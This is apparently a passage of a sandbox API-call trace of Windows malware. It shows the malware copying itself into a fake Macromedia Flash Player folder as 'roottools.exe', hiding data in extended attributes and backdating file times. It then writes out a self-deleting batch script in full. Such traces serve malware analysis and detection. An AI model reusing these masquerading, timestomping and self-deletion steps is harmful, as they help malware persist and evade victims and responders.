(in: lpVersionInformation=0x18ea18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18ea18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.658] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18e860 | out: pszPath="C:\\Windows") returned 0x0 [0083.658] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0083.659] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18ea68, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0083.659] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0083.659] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0083.659] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0083.659] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18ea68, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0083.659] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x18ebc2 | out: pclsid=0x18ebc2*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0083.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", cchWideChar=76, lpMultiByteStr=0x18ebf6, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpUsedDefaultChar=0x0) returned 76 [0083.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin", cchWideChar=80, lpMultiByteStr=0x18ec8c, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin", lpUsedDefaultChar=0x0) returned 80 [0083.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv", cchWideChar=85, lpMultiByteStr=0x18ed22, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv", lpUsedDefaultChar=0x0) returned 85 [0083.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig", cchWideChar=85, lpMultiByteStr=0x18edb8, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig", lpUsedDefaultChar=0x0) returned 85 [0083.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acuhci", cchWideChar=6, lpMultiByteStr=0x18ee4e, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acuhci", lpUsedDefaultChar=0x0) returned 6 [0083.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Omegovna", cchWideChar=8, lpMultiByteStr=0x18ee58, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Omegovna", lpUsedDefaultChar=0x0) returned 8 [0083.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Eteg", cchWideChar=4, lpMultiByteStr=0x18ee62, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Eteg", lpUsedDefaultChar=0x0) returned 4 [0083.660] lstrcmpiA (lpString1="Omegovna", lpString2="Eteg") returned 1 [0083.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Baywkivyl", cchWideChar=9, lpMultiByteStr=0x18ee6c, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Baywkivyl", lpUsedDefaultChar=0x0) returned 9 [0083.660] lstrcmpiA (lpString1="Omegovna", lpString2="Baywkivyl") returned 1 [0083.660] lstrcmpiA (lpString1="Eteg", lpString2="Baywkivyl") returned 1 [0083.660] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0083.660] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x18e9fc | out: lpFileSize=0x18e9fc*=196608) returned 1 [0083.660] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0083.660] ReadFile (in: hFile=0x148, lpBuffer=0x330000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x18ea0c, lpOverlapped=0x0 | out: lpBuffer=0x330000*, lpNumberOfBytesRead=0x18ea0c*=0x30000, lpOverlapped=0x0) returned 1 [0083.662] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0083.662] WriteFile (in: hFile=0x178, lpBuffer=0x330000*, nNumberOfBytesToWrite=0x30000, lpNumberOfBytesWritten=0x18ea04, lpOverlapped=0x0 | out: lpBuffer=0x330000*, lpNumberOfBytesWritten=0x18ea04*=0x30000, lpOverlapped=0x0) returned 1 [0083.664] CloseHandle (hObject=0x178) returned 1 [0083.666] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.667] CloseHandle (hObject=0x148) returned 1 [0083.667] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77270000 [0083.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtPathName=0x18e9e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.667] NtCreateFile (in: FileHandle=0x18e9c4, DesiredAccess=0x10, ObjectAttributes=0x18e9e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18e9d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18e9c4*=0x148, IoStatusBlock=0x18e9d8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0083.667] NtSetEaFile (FileHandle=0x148, IoStatusBlock=0x18e9d8, EaBuffer=0x1e1be48*(NextEntryOffset=0x0, Flags=0x0, EaNameLength=0x4, EaValueLength=0x2fe, EaName="data", EaValue=0x1e1be55*), EaBufferSize=0x310) returned 0x0 [0083.668] NtClose (Handle=0x148) returned 0x0 [0083.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x148 [0083.669] GetFileTime (in: hFile=0x148, lpCreationTime=0x18eb50, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x18eb50*(dwLowDateTime=0x2335d4a0, dwHighDateTime=0x1d2f180), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0083.669] CloseHandle (hObject=0x148) returned 1 [0083.669] GetSystemTime (in: lpSystemTime=0x18e8e8 | out: lpSystemTime=0x18e8e8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x34, wSecond=0x31, wMilliseconds=0x2d)) [0083.669] SystemTimeToFileTime (in: lpSystemTime=0x18e8e8, lpFileTime=0x18e8f8 | out: lpFileTime=0x18e8f8) returned 1 [0083.669] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 0 [0083.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0083.669] SetFileTime (hFile=0x148, lpCreationTime=0x18eb1c, lpLastAccessTime=0x18eb1c, lpLastWriteTime=0x18eb1c) returned 1 [0083.669] CloseHandle (hObject=0x148) returned 1 [0083.669] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.669] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.669] GetSystemTime (in: lpSystemTime=0x18e8e8 | out: lpSystemTime=0x18e8e8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x34, wSecond=0x31, wMilliseconds=0x2d)) [0083.669] SystemTimeToFileTime (in: lpSystemTime=0x18e8e8, lpFileTime=0x18e8f8 | out: lpFileTime=0x18e8f8) returned 1 [0083.669] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin") returned 0 [0083.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0083.669] SetFileTime (hFile=0x148, lpCreationTime=0x18eb1c, lpLastAccessTime=0x18eb1c, lpLastWriteTime=0x18eb1c) returned 1 [0083.669] CloseHandle (hObject=0x148) returned 1 [0083.669] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.669] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.670] GetSystemTime (in: lpSystemTime=0x18e8e8 | out: lpSystemTime=0x18e8e8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x34, wSecond=0x31, wMilliseconds=0x3d)) [0083.670] SystemTimeToFileTime (in: lpSystemTime=0x18e8e8, lpFileTime=0x18e8f8 | out: lpFileTime=0x18e8f8) returned 1 [0083.670] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned 0 [0083.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0083.670] SetFileTime (hFile=0x148, lpCreationTime=0x18eb1c, lpLastAccessTime=0x18eb1c, lpLastWriteTime=0x18eb1c) returned 1 [0083.670] CloseHandle (hObject=0x148) returned 1 [0083.670] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.670] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.670] GetSystemTime (in: lpSystemTime=0x18e8e8 | out: lpSystemTime=0x18e8e8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x34, wSecond=0x31, wMilliseconds=0x3d)) [0083.670] SystemTimeToFileTime (in: lpSystemTime=0x18e8e8, lpFileTime=0x18e8f8 | out: lpFileTime=0x18e8f8) returned 1 [0083.670] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned 0 [0083.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0083.670] SetFileTime (hFile=0x148, lpCreationTime=0x18eb1c, lpLastAccessTime=0x18eb1c, lpLastWriteTime=0x18eb1c) returned 1 [0083.670] CloseHandle (hObject=0x148) returned 1 [0083.670] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.670] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0083.671] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.671] wvnsprintfW (in: pszDest=0x1e1be48, cchDest=516, pszFmt="\"%s\"", arglist=0x18f88c | out: pszDest="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 112 [0083.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpStartupInfo=0x18f824*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f868 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", lpProcessInformation=0x18f868*(hProcess=0x178, hThread=0x148, dwProcessId=0x7a8, dwThreadId=0x97c)) returned 1 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="7F") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="0E") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6C") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A1") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="75") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D0") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="AD") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DE") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="F9") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="23") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FD") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A0") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EF") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D2") returned 2 [0083.681] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="11") returned 2 [0083.681] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName="7F0E6CA175D0ADDEF923FDA009EFD211") returned 0x180 [0083.681] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18f8bc*=0x180, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0093.788] CloseHandle (hObject=0x180) returned 1 [0093.788] CloseHandle (hObject=0x148) returned 1 [0093.788] CloseHandle (hObject=0x178) returned 1 [0093.788] ReleaseMutex (hMutex=0x14c) returned 1 [0093.788] CloseHandle (hObject=0x14c) returned 1 [0093.788] CharToOemW (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", pDst=0x18f7a0 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe") returned 1 [0093.788] wvnsprintfA (in: pszDest=0x18f534, cchDest=620, pszFmt=":d\r\ndel /F /Q \"%s\"\r\nif exist \"%s\" goto d", arglist=0x18f52c | out: pszDest=":d\r\ndel /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\"\r\nif exist \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\" goto d") returned 124 [0093.789] GetTempPathW (in: nBufferLength=0xf6, lpBuffer=0x18eb9c | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0093.789] wvnsprintfW (in: pszDest=0x18eda4, cchDest=260, pszFmt="%s%08x.%s", arglist=0x18eb88 | out: pszDest="updaa5900b0.bat") returned 15 [0093.789] PathCombineW (in: pszDest=0x18f2dc, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="updaa5900b0.bat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" [0093.789] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.789] CloseHandle (hObject=0x14c) returned 1 [0093.789] CharToOemW (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", pDst=0x18f1d8 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 1 [0093.789] wvnsprintfA (in: pszDest=0x1e1be80, cchDest=540, pszFmt="@echo off\r\n%s\r\ndel /F \"%s\"\r\n", arglist=0x18efb0 | out: pszDest="@echo off\r\n:d\r\ndel /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\"\r\nif exist \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\" goto d\r\ndel /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"\r\n") returned 200 [0093.790] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.790] WriteFile (in: hFile=0x14c, lpBuffer=0x1e1be80*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x18efa8, lpOverlapped=0x0 | out: lpBuffer=0x1e1be80*, lpNumberOfBytesWritten=0x18efa8*=0xc8, lpOverlapped=0x0) returned 1 [0093.790] CloseHandle (hObject=0x14c) returned 1 [0093.791] wvnsprintfW (in: pszDest=0x18efbc, cchDest=270, pszFmt="/c \"%s\"", arglist=0x18efb4 | out: pszDest="/c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"") returned 57 [0093.791] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18f2dc, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.791] wvnsprintfW (in: pszDest=0x1e1be80, cchDest=519, pszFmt="\"%s\" %s", arglist=0x18ef90 | out: pszDest="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"") returned 87 [0093.791] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f4e4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef70 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"", lpProcessInformation=0x18ef70*(hProcess=0x178, hThread=0x14c, dwProcessId=0x7f0, dwThreadId=0x7fc)) returned 1 [0093.798] CloseHandle (hObject=0x14c) returned 1 [0093.798] CloseHandle (hObject=0x178) returned 1 [0093.798] ExitProcess (uExitCode=0x0) [0093.802] UnhookWindowsHookEx (hhk=0x901ad) returned 1 [0093.802] CloseHandle (hObject=0x7c) returned 1 [0093.802] CloseHandle (hObject=0x80) returned 1 [0093.802] VirtualFree (lpAddress=0x1eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.804] HeapDestroy (hHeap=0x1ea0000) returned 1 Thread: id = 107 os_tid = 0x6c4 Process: id = "7" image_name = "roottools.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" page_root = "0x2e3ef000" os_pid = "0x7a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x65c" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT 